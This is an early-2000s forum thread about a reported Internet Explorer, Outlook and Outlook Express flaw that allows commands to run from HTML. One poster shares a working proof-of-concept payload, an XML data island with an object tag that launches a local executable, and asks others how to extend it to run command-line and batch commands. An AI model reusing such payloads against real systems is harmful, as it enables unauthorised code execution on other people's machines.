#15195 - 03/04/02 10:43 PM
IE, Outlook and OE vulnerability
|
Joined: Mar 2002
Posts: 16
Nexus
Junior Member
|
Junior Member
Joined: Mar 2002
Posts: 16
UK
|
Extract from http://www.theregister.co.uk/content/4/24274.html An attacker can run arbitrary commands on Windows machines with a simple bit of HTML, an Israeli security researcher has demonstrated. The exploit will work with IE, Outlook and OutlooK Express even if active scripting and ActiveX are disabled in the browser security settings. Further details at http://security.greymagic.com/adv/gm001-ie/
|
|
|
#15196 - 03/05/02 12:36 PM
Re: IE, Outlook and OE vulnerability
|
Joined: Mar 2002
Posts: 5
Kryptic Codez
Junior Member
|
Junior Member
Joined: Mar 2002
Posts: 5
|
Actually I tried the code out in the article and it didn't work.
-Kryptic Codez
"sheep mesmerized by television...the real American drug addiction..."
|
|
|
#15198 - 03/06/02 12:58 AM
Re: IE, Outlook and OE vulnerability
|
Joined: Mar 2002
Posts: 56
spectre
Junior Member
|
Junior Member
Joined: Mar 2002
Posts: 56
192.168.128.80
|
the code worked for me. i had to edit it to fix it so it worked with WINME (CALC was in C:\Windows\, not Windows\System)
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/CALC.exe"></object> ]]> </exploit> </security> </xml>
I then tried to create a shortcut to Windows' Command.com, but it didn't work because when u create a shortcut to command.com, it is not considered an actual shortcut, but:
Type of File: Performs text-based (command-line) functions.
I then tried to get the code to pass functions to MS-DOS. unfortunately, for the same reason as above, you CANNOT open command.com because it is the same type of file as above.
Not knowing XML I cannot tell you how to do this, but the only work around I can think of is to know exactly what u are going to do (of course u will) and open Notepad and pass a command.com argument to it, then whatever argument to that, and same the file as perform.bat and save it then run it. all from the same XML file. if anyone knows how to do this, it would be great if I could see the code! thanks!
|
|
|
#15202 - 03/07/02 01:49 AM
Re: IE, Outlook and OE vulnerability
|
Joined: Mar 2002
Posts: 56
spectre
Junior Member
|
Junior Member
Joined: Mar 2002
Posts: 56
192.168.128.80
|
the fact of the matter is, it will not allow you to open a command prompt. the only way you could open a command prompt with this XML is to create a program that opens a command prompt, compile it, and have this link to the .EXE. of course, the person u use this on will not have that EXE on there computer, so it doesn't matter anyway. as i said above, you cannot open command.com, command.exe, ms-dos, etc.
|
|
|
|
Forums41
Topics33,701
Posts68,795
Average Daily Posts0
|
Members2,173
Most Online1,567 Apr 25th, 2010
|
|
|
Okay WTF?
by HenryMiring on 09/27/17 08:45 AM
|
|
|
|
|
|
|
|